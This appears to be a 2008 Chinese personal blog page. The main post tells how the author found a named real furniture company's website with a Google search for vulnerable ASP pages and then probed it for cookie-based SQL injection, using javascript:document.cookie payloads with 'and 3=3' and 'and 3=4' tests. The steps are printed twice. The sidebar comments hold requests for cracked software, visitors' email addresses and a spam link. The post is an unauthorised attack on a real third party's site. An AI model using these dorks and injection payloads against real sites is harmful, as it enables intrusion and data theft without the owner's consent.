- [hwsoot] 学习 04/26 03:20
- [游客] 能不能把破解版发我啊?谢谢啊.zjjhfhj@qq.com 05/11 17:35
- [parse] 赞一个! 04/17 20:46
- [游客] 能不能把破解版发我啊?谢谢啊,673856545@qq.com 04/17 13:53
- [游客] 能不能把破解版发我啊?谢谢啊,86738484@qq.com 04/06 21:26
- [游客] 解决了 谢谢~~ 02/24 08:56
- [游客] 怎么解决的呢? 02/24 08:54
- [游客] 能把你破解的版本发给我吗,谢谢.306844939@qq.com 01/18 19:34
- [游客] 通过了,谢谢~~~ 12/06 16:38
- [gsyangchao] 非常不错! 10/09 10:43
- [游客] [url=http://www.gddzbq.com]深圳搬家公司[/url] [url=http 03/02 15:10
- [ewer87] 找到了.PHPmyadmin.. 05/24 14:00
- [ewer87] 请问你在8tt,那个数据库是怎么应用的? 是自己上传么? 为什么传不上去? 不懂。我是第 05/24 13:19
[2008-08-12 23:05] 康耐登家具网站有cookie注入漏洞!!!!(如果那篇文章严谨的话)
http://www.hf110.com/Article/hack/hcjs/200804/3704.html
为了实践这篇文章的内容,
1.我先在GOOGLE中搜索INURL:asp?id= 找到了康耐登家具网站,先去掉 ?ID=321 回车,发现网页不正常显示,
2.再输入javascript:alert(document.cookie="id="+escape("123")); 回车,按掉弹出的窗口,刷新,发现正常显示,说明用的是request("id")。
3.再输入javascript:alert(document.cookie="id="+escape("123 and 3=3")); ,回车,确定,刷新,发现能正常显示。
4.输入javascript:alert(document.cookie="id="+escape("123 and 3=4")); ,回车,确定,刷新 ,发现网页不能正常显示。
javascript:alert(document.cookie="id="+escape("123 and 3=4"));
5.这就表明有漏洞了。
为了实践这篇文章的内容,
1.我先在GOOGLE中搜索INURL:asp?id= 找到了康耐登家具网站,先去掉 ?ID=321 回车,发现网页不正常显示,
2.再输入javascript:alert(document.cookie="id="+escape("123")); 回车,按掉弹出的窗口,刷新,发现正常显示,说明用的是request("id")。
3.再输入javascript:alert(document.cookie="id="+escape("123 and 3=3")); ,回车,确定,刷新,发现能正常显示。
4.输入javascript:alert(document.cookie="id="+escape("123 and 3=4")); ,回车,确定,刷新 ,发现网页不能正常显示。
javascript:alert(document.cookie="id="+escape("123 and 3=4"));
5.这就表明有漏洞了。
评论次数(2) |
浏览次数(508) |
类型(hack过程) |
收藏此文 |